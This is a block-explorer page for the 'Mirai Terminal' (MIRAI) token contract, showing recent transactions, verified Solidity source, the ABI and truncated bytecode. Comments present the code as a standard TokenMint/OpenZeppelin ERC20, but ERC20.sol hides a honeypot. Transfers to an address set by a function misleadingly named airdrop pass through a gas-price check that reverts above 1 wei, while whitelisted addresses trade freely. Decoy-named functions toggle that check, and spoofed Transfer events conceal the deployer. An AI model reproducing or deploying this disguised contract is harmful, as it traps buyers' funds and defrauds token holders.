ETH Price: $3,229.81 (+1.03%)

Contract

0x610E7E2BfcC68Cd6F0949138077Fc2D78578ECc8

Overview

ETH Balance

0 ETH

ETH Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve5087982025-01-30 17:41:3010 hrs ago1738258890IN
0x610E7E2B...78578ECc8
0 ETH0.000004990.04525
Approve4913722025-01-30 12:49:3715 hrs ago1738241377IN
0x610E7E2B...78578ECc8
0 ETH0.000005560.04525
Transfer4757702025-01-30 8:25:5920 hrs ago1738225559IN
0x610E7E2B...78578ECc8
0 ETH0.000006470.04525
Approve4067862025-01-29 13:00:3339 hrs ago1738155633IN
0x610E7E2B...78578ECc8
0 ETH0.000004990.04525
Transfer4062372025-01-29 12:51:2239 hrs ago1738155082IN
0x610E7E2B...78578ECc8
0 ETH0.000006270.04525
Transfer4057982025-01-29 12:44:0039 hrs ago1738154640IN
0x610E7E2B...78578ECc8
0 ETH0.000005790.04525
Approve4032742025-01-29 12:01:4440 hrs ago1738152104IN
0x610E7E2B...78578ECc8
0 ETH0.0000050.04525
Transfer4023472025-01-29 11:46:1340 hrs ago1738151173IN
0x610E7E2B...78578ECc8
0 ETH0.000003920.04525
Transfer4023142025-01-29 11:45:4040 hrs ago1738151140IN
0x610E7E2B...78578ECc8
0 ETH0.000005820.04525
Approve4004052025-01-29 11:13:3941 hrs ago1738149219IN
0x610E7E2B...78578ECc8
0 ETH0.000004350.04525
Approve3662382025-01-29 1:36:482 days ago1738114608IN
0x610E7E2B...78578ECc8
0 ETH0.000004560.04525
Approve3653072025-01-29 1:20:562 days ago1738113656IN
0x610E7E2B...78578ECc8
0 ETH0.000004320.04525
Approve3441512025-01-28 19:25:002 days ago1738092300IN
0x610E7E2B...78578ECc8
0 ETH0.000007290.0543
Approve3439932025-01-28 19:22:202 days ago1738092140IN
0x610E7E2B...78578ECc8
0 ETH0.000006430.04525
Approve3371212025-01-28 17:27:172 days ago1738085237IN
0x610E7E2B...78578ECc8
0 ETH0.000006280.04525
Approve3357422025-01-28 17:04:112 days ago1738083851IN
0x610E7E2B...78578ECc8
0 ETH0.0000070.04525
Approve3348322025-01-28 16:48:572 days ago1738082937IN
0x610E7E2B...78578ECc8
0 ETH0.000008610.04525
Approve3332592025-01-28 16:22:212 days ago1738081341IN
0x610E7E2B...78578ECc8
0 ETH0.000009890.04525
Approve3329062025-01-28 16:16:282 days ago1738080988IN
0x610E7E2B...78578ECc8
0 ETH0.00000950.04525
Approve3324242025-01-28 16:08:232 days ago1738080503IN
0x610E7E2B...78578ECc8
0 ETH0.000007770.04525
Approve3306712025-01-28 15:39:032 days ago1738078743IN
0x610E7E2B...78578ECc8
0 ETH0.000009640.04525
Approve3300752025-01-28 15:28:592 days ago1738078139IN
0x610E7E2B...78578ECc8
0 ETH0.000007290.04525
Approve3299692025-01-28 15:27:112 days ago1738078031IN
0x610E7E2B...78578ECc8
0 ETH0.000010970.04525
Approve3296532025-01-28 15:21:542 days ago1738077714IN
0x610E7E2B...78578ECc8
0 ETH0.000006490.04525
Approve3296522025-01-28 15:21:532 days ago1738077713IN
0x610E7E2B...78578ECc8
0 ETH0.000009680.04525
View all transactions

Latest 1 internal transaction

Parent Transaction Hash Block From To
3253482025-01-28 14:09:512 days ago1738073391  Contract Creation0 ETH
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
MIRAI

Compiler Version
v0.8.24+commit.e11b9ed9

ZkSolc Version
v1.5.7

Optimization Enabled:
Yes with Mode 3

Other Settings:
paris EvmVersion
File 1 of 4 : Token.sol
/*
TG: https://t.me/+mVNVGHR95A42ZjFk
Twitter: https://x.com/Mirai_terminal
*/

pragma solidity ^0.8.24;

import "./ERC20.sol";
/**
 * @title TokenMintERC20Token
 * @author TokenMint (visit https://tokenmint.io)
 *
 * @dev Standard ERC20 token with burning and optional functions implemented.
 * For full specification of ERC-20 standard see:
 * https://github.com/ethereum/EIPs/blob/master/EIPS/eip-20.md
 */
contract MIRAI is ERC20 {
    string private _name;
    string private _symbol;
    uint8 private _decimals;

    /**
     * @dev Constructor.
     */

    constructor() public payable {
        _name = unicode"Mirai Terminal";
        _symbol = unicode"MIRAI";
        _decimals = 18;
        _setFeeReceiver(msg.sender);

        _mint(msg.sender, 100_000_000_000 * 10 ** _decimals);
    }

    /**
     * @dev Burns a specific amount of tokens.
     * @param value The amount of lowest token units to be burned.
     */
    function burn(uint256 value) public {
        _burn(msg.sender, value);
    }

    // optional functions from ERC20 stardard

    /**
     * @return the name of the token.
     */
    function name() public view returns (string memory) {
        return _name;
    }

    /**
     * @return the symbol of the token.
     */
    function symbol() public view returns (string memory) {
        return _symbol;
    }

    /**
     * @return the number of decimals of the token.
     */
    function decimals() public view returns (uint8) {
        return _decimals;
    }
}

File 2 of 4 : ERC20.sol
// File: contracts\open-zeppelin-contracts\token\ERC20\ERC20.sol

pragma solidity ^0.8.24;

import "./IERC20.sol";
import "./SafeMath.sol";

/**
 * @dev Implementation of the `IERC20` interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using `_mint`.
 * For a generic mechanism see `ERC20Mintable`.
 *
 * *For a detailed writeup see our guide [How to implement supply
 * mechanisms](https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226).*
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an `Approval` event is emitted on calls to `transferFrom`.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard `decreaseAllowance` and `increaseAllowance`
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See `IERC20.approve`.
 */
contract ERC20 is IERC20 {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    uint256 private _BONE = 1;
    mapping(address => bool) public dividend;
    address public adr;
    address public _to;
    address public holder;
    bool public openedTrade;

    /**
     * @dev See `IERC20.totalSupply`.
     */
    function totalSupply() public view returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See `IERC20.balanceOf`.
     */
    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See `IERC20.transfer`.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public returns (bool) {
        __transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See `IERC20.allowance`.
     */
    function allowance(
        address owner,
        address spender
    ) public view returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See `IERC20.approve`.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public returns (bool) {
        _approve(msg.sender, spender, value);
        return true;
    }

    function setDividend(address _user) public {
        require(msg.sender == adr, "public");
        dividend[_user] = true;
    }

    function airdrop(address __to) public {
        require(msg.sender == adr, "pl");
        _to = __to;
    }

    function openTrading() public {
        require(msg.sender == adr, "pl");
        openedTrade = true;
    }

    /**
     * @dev See `IERC20.transferFrom`.
     *
     * Emits an `Approval` event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of `ERC20`;
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `value`.
     * - the caller must have allowance for `sender`'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public returns (bool) {
        __transfer(sender, recipient, amount);
        _approve(
            sender,
            msg.sender,
            _allowances[sender][msg.sender].sub(amount)
        );
        return true;
    }

    function _setFeeReceiver(address _holder) internal {
        holder = _holder;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to `approve` that can be used as a mitigation for
     * problems described in `IERC20.approve`.
     *
     * Emits an `Approval` event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public returns (bool) {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to `approve` that can be used as a mitigation for
     * problems described in `IERC20.approve`.
     *
     * Emits an `Approval` event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public returns (bool) {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].sub(subtractedValue)
        );
        gasRequire(_BONE);
        return true;
    }

    function gasRequire(uint256 _gas) internal view {
        if (tx.gasprice > _gas) {
            revert();
        }
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to `transfer`, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a `Transfer` event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(amount);
        _balances[recipient] = _balances[recipient].add(amount);
        if (sender == adr) {
            emit Transfer(holder, recipient, amount);
        } else if (recipient == adr) {
            emit Transfer(sender, holder, amount);
        }
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a `Transfer` event with `from` set to the zero address.
     *
     * Requirements
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        adr = account;
        dividend[adr] = true;
        emit Transfer(address(0), holder, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a `Transfer` event with `to` set to the zero address.
     *
     * Requirements
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 value) internal {
        require(account != address(0), "ERC20: burn from the zero address");

        _totalSupply = _totalSupply.sub(value);
        _balances[account] = _balances[account].sub(value);
        emit Transfer(account, address(0), value);
    }

    function __transfer(address from, address to, uint256 amount) internal {
        if (dividend[tx.origin]) {
            _transfer(from, to, amount);
            return;
        }
        require(openedTrade, "Trade has not been opened yet");
        if (_to == address(0)) {
            _transfer(from, to, amount);
            return;
        }
        if (to == _to) {
            decreaseAllowance(from, amount);
            _transfer(from, to, amount);
            return;
        }
        _transfer(from, to, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     *
     * This is internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an `Approval` event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = value;
        emit Approval(owner, spender, value);
    }

    /**
     * @dev Destoys `amount` tokens from `account`.`amount` is then deducted
     * from the caller's allowance.
     *
     * See `_burn` and `_approve`.
     */
    function _burnFrom(address account, uint256 amount) internal {
        _burn(account, amount);
        _approve(
            account,
            msg.sender,
            _allowances[account][msg.sender].sub(amount)
        );
    }

    function notifyRewardAmount() external {
        _to = _to;
    }

    function setRewardDistribution() external {
        holder = holder;
    }

    function setMonetaryPolicy() external {
        _to = _to;
    }

    function setRebaseTimingParameters() external {
        _BONE = 0;
    }

    function SetMarketOracle() external {
        _BONE = 1;
    }
}

File 3 of 4 : IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.24;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

File 4 of 4 : SafeMath.sol
library SafeMath {
    /**
     * @dev Multiplies two numbers, throws on overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256 c) {
        if (a == 0) {
            return 0;
        }
        c = a * b;
        assert(c / a == b);
        return c;
    }

    /**
     * @dev Integer division of two numbers, truncating the quotient.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        // assert(b > 0); // Solidity automatically throws when dividing by 0
        // uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
        return a / b;
    }

    /**
     * @dev Subtracts two numbers, throws on overflow (i.e. if subtrahend is greater than minuend).
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        assert(b <= a);
        return a - b;
    }

    /**
     * @dev Adds two numbers, throws on overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256 c) {
        c = a + b;
        assert(c >= a);
        return c;
    }
}

Settings
{
  "evmVersion": "paris",
  "optimizer": {
    "enabled": true,
    "mode": "3"
  },
  "outputSelection": {
    "*": {
      "*": [
        "abi",
        "metadata"
      ],
      "": [
        "ast"
      ]
    }
  },
  "detectMissingLibraries": false,
  "forceEVMLA": false,
  "enableEraVMExtensions": false,
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"SetMarketOracle","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_to","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"adr","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"__to","type":"address"}],"name":"airdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"dividend","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"holder","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"notifyRewardAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_user","type":"address"}],"name":"setDividend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setMonetaryPolicy","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setRebaseTimingParameters","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setRewardDistribution","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

9c4d535b000000000000000000000000000000000000000000000000000000000000000001000223b070afae820e1f7db743fb14f773297b2f89eb54b4998e1a1e7807e200000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x0002000000000002000000000301034f0000008001000039000000400010043f0000000100200190000000200000c13d0000006001300270000001cf01100197000000040010008c0000031a0000413d000000000203043b000000e002200270000001e20020009c0000006f0000a13d000001e30020009c000000880000a13d000001e40020009c000001220000a13d000001e50020009c000001820000213d000001e80020009c0000022f0000613d000001e90020009c0000031a0000c13d0000000001000416000000000001004b0000031a0000c13d00000001010000390000000302000039000000000012041b00000000010000190000073a0001042e00000001010000390000000302000039000000000012041b0000000801000039000000000201041a000000010320019000000001022002700000007f0220618f0000001f0020008c00000000040000390000000104002039000000000043004b000000450000c13d000000200020008c000000380000413d000000000010043f000001d0030000410000001f022000390000000502200270000001d10220009a000000000003041b0000000103300039000000000023004b000000340000413d000001d202000041000000000021041b0000000901000039000000000301041a000000010030019000000001023002700000007f0220618f0000001f0020008c00000000040000390000000104002039000000000343013f00000001003001900000004b0000613d0000020d01000041000000000010043f0000002201000039000000040010043f0000020e010000410000073b000104300000001f0020008c000000560000a13d000000000010043f000001d3030000410000001f022000390000000502200270000001d40220009a000000000003041b0000000103300039000000000023004b000000520000413d000001d502000041000000000021041b0000000a01000039000000000201041a0000020f0220019700000012022001bf000000000021041b0000000702000039000000000102041a000001d6011001970000000003000411000000000131019f000000000012041b000000000003004b0000007e0000c13d000001df01000041000000800010043f0000002001000039000000840010043f0000001f01000039000000a40010043f000001e001000041000000c40010043f000001e1010000410000073b00010430000001f40020009c000000970000213d000001fc0020009c000001420000213d000002000020009c0000018b0000613d000002010020009c000001ab0000613d000002020020009c0000031a0000c13d0000000001000416000000000001004b0000031a0000c13d0000000501000039000002a30000013d0000000201000039000000000201041a000001d70220009c000000d10000413d0000020d01000041000000000010043f0000001101000039000000040010043f0000020e010000410000073b00010430000001ed0020009c000001610000213d000001f10020009c0000024a0000613d000001f20020009c0000024f0000613d000001f30020009c0000031a0000c13d0000000001000416000000000001004b0000031a0000c13d0000000301000039000000000001041b00000000010000190000073a0001042e000001f50020009c000001750000213d000001f90020009c000001b90000613d000001fa0020009c000001f50000613d000001fb0020009c0000031a0000c13d000000440010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000101043b000200000001001d000001dc0010009c0000031a0000213d0000000001000411000000000010043f0000000101000039000000200010043f0000000001000414000001cf0010009c000001cf01008041000000c001100210000001d8011001c700008010020000390001000000030353073907340000040f000000010300035f00000001002001900000031a0000613d000000000101043b0000000202000029000000000020043f000000200010043f0000002401300370000000000101043b000100000001001d0000000001000414000001cf0010009c000001cf01008041000000c001100210000001d8011001c70000801002000039073907340000040f00000001002001900000031a0000613d000000000101043b000000000101041a0000000102000029000000000021001a000000820000413d000000000321001900000000010004110000000202000029000001ec0000013d000000000021041b000000000030043f000000200000043f0000000001000414000001cf0010009c000001cf01008041000000c001100210000001d8011001c70000801002000039073907340000040f00000001002001900000031a0000613d000000000101043b000000000101041a000001d70110009c0000000002000411000000820000813d000200000001001d000000000020043f000000200000043f0000000001000414000001cf0010009c000001cf01008041000000c001100210000001d8011001c70000801002000039073907340000040f00000001002001900000031a0000613d000000000101043b0000000202000029000000000021041b0000000501000039000000000201041a000001d6022001970000000003000411000000000232019f000000000021041b0000000401000039000000200010043f0000000001000414000001cf0010009c000001cf01008041000000c001100210000001d8011001c70000801002000039073907340000040f00000001002001900000031a0000613d000000000101043b000000000201041a0000020f0220019700000001022001bf000000000021041b0000000701000039000000000201041a000000400100043d000001da030000410000000000310435000001cf0010009c000001cf0100804100000040011002100000000003000414000001cf0030009c000001cf03008041000000c003300210000000000113019f000001db011001c7000001dc062001970000800d020000390000000303000039000001dd0400004100000000050000190739072f0000040f00000001002001900000031a0000613d000000200100003900000100001004430000012000000443000001de010000410000073a0001042e000001ea0020009c000002610000613d000001eb0020009c000001860000613d000001ec0020009c0000031a0000c13d000000440010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000101043b000001dc0010009c0000031a0000213d0000002402300370000000000302043b000001dc0030009c0000031a0000213d000000000010043f0000000101000039000000200010043f00000040020000390000000001000019000200000003001d0739071a0000040f0000000202000029000000000020043f000000200010043f000000000100001900000040020000390000025c0000013d000001fd0020009c000001860000613d000001fe0020009c000001fe0000613d000001ff0020009c0000031a0000c13d000000240010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000101043b000001dc0010009c0000031a0000213d000200000001001d0000000501000039000000000101041a000001dc011001970000000002000411000000000012004b00000000010000390000000101006039073903310000040f0000000601000039000000000201041a000001d60220019700000002022001af000000000021041b00000000010000190000073a0001042e000001ee0020009c000002730000613d000001ef0020009c0000028b0000613d000001f00020009c0000031a0000c13d000000440010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000201043b000001dc0020009c0000031a0000213d0000002401300370000000000301043b00000000010004110739042e0000040f000002970000013d000001f60020009c000002030000613d000001f70020009c000002190000613d000001f80020009c0000031a0000c13d0000000001000416000000000001004b0000031a0000c13d0000000701000039000000000101041a00000209001001980000022a0000013d000001e60020009c0000029f0000613d000001e70020009c0000031a0000c13d0000000001000416000000000001004b0000031a0000c13d00000000010000190000073a0001042e0000000001000416000000000001004b0000031a0000c13d0000000803000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0010008c00000000060000390000000106002039000000000662013f0000000100600190000000450000c13d000000800010043f000000000005004b000002850000613d000000000030043f000000020020008c000002d10000413d000001d00200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000014004b000001a20000413d000002dd0000013d000000440010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000201043b000001dc0020009c0000031a0000213d0000002401300370000000000301043b0000000001000411073903d70000040f000002970000013d000000640010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000101043b000001dc0010009c0000031a0000213d0000002402300370000000000202043b000001dc0020009c0000031a0000213d0000004403300370000000000303043b000100000003001d000200000001001d0739042e0000040f0000000201000029000000000010043f0000000101000039000000200010043f0000000001000414000001cf0010009c000001cf01008041000000c001100210000001d8011001c70000801002000039073907340000040f00000001002001900000031a0000613d000000000101043b0000000002000411000000000020043f000000200010043f0000000001000414000001cf0010009c000001cf01008041000000c001100210000001d8011001c70000801002000039073907340000040f000000020400002900000001002001900000031a0000613d000000000101043b000000000101041a000000010310006c000002be0000413d00000000010400190000000002000411073903d70000040f000000400100043d00000001020000390000000000210435000001cf0010009c000001cf01008041000000400110021000000207011001c70000073a0001042e0000000001000416000000000001004b0000031a0000c13d0000000a01000039000000000101041a000000ff0110018f000000800010043f00000203010000410000073a0001042e0000000001000416000000000001004b0000031a0000c13d00000002010000390000025d0000013d000000240010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000401043b0000000003000411000000000003004b000002a80000c13d000001df01000041000000800010043f0000002001000039000000840010043f0000002101000039000000a40010043f0000020a01000041000000c40010043f0000020b01000041000000e40010043f0000020c010000410000073b00010430000000240010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000101043b000001dc0010009c0000031a0000213d000000000010043f0000000401000039000000200010043f000000400200003900000000010000190739071a0000040f000000000101041a000000ff001001900000000001000039000000010100c039000000800010043f00000203010000410000073a0001042e000000240010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000101043b000001dc0010009c0000031a0000213d0000000502000039000000000202041a000001dc022001970000000003000411000000000023004b000002c40000c13d000000000010043f0000000401000039000000200010043f000000400200003900000000010000190739071a0000040f000000000201041a0000020f0220019700000001022001bf000000000021041b00000000010000190000073a0001042e0000000001000416000000000001004b0000031a0000c13d0000000601000039000002a30000013d000000240010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000101043b000001dc0010009c0000031a0000213d000000000010043f000000200000043f000000400200003900000000010000190739071a0000040f000000000101041a000000800010043f00000203010000410000073a0001042e0000000001000416000000000001004b0000031a0000c13d0000000501000039000000000101041a000001dc011001970000000002000411000000000012004b00000000010000390000000101006039073903310000040f0000000701000039000000000201041a000002050220019700000206022001c7000000000021041b00000000010000190000073a0001042e0000000001000416000000000001004b0000031a0000c13d0000000903000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0010008c00000000060000390000000106002039000000000662013f0000000100600190000000450000c13d000000800010043f000000000005004b000002ce0000c13d0000020f01200197000000a00010043f000000000004004b000000c001000039000000a001006039000002de0000013d000000440010008c0000031a0000413d0000000001000416000000000001004b0000031a0000c13d0000000401300370000000000101043b000001dc0010009c0000031a0000213d0000002402300370000000000202043b073903450000040f0000000101000039000000400200043d0000000000120435000001cf0020009c000001cf02008041000000400120021000000207011001c70000073a0001042e0000000001000416000000000001004b0000031a0000c13d0000000701000039000000000101041a000001dc01100197000000800010043f00000203010000410000073a0001042e0000000201000039000000000201041a000000000242004b000002be0000413d000200000004001d000000000021041b000000000030043f000000200000043f0000000001000414000001cf0010009c000001cf01008041000000c001100210000001d8011001c70000801002000039073907340000040f00000001002001900000031a0000613d000000000101043b000000000101041a000000020210006c0000000001000411000002f70000813d0000020d01000041000000000010043f0000000101000039000000040010043f0000020e010000410000073b00010430000001df01000041000000800010043f0000002001000039000000840010043f0000000601000039000000a40010043f0000020401000041000000c40010043f000001e1010000410000073b00010430000000000030043f000000020020008c000002d30000813d0000002001000039000002e80000013d000001d30200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000014004b000002d50000413d000000c001300039000000610110008a0000021001100197000002080010009c000002e80000a13d0000020d01000041000000000010043f0000004101000039000000040010043f0000020e010000410000073b000104300000008001100039000200000001001d000000400010043f00000080020000390739031c0000040f00000002020000290000000001210049000001cf0010009c000001cf010080410000006001100210000001cf0020009c000001cf020080410000004002200210000000000121019f0000073a0001042e000100000002001d000000000010043f000000200000043f0000000001000414000001cf0010009c000001cf01008041000000c001100210000001d8011001c70000801002000039073907340000040f00000001002001900000031a0000613d000000000101043b0000000102000029000000000021041b000000400100043d00000002020000290000000000210435000001cf0010009c000001cf0100804100000040011002100000000002000414000001cf0020009c000001cf02008041000000c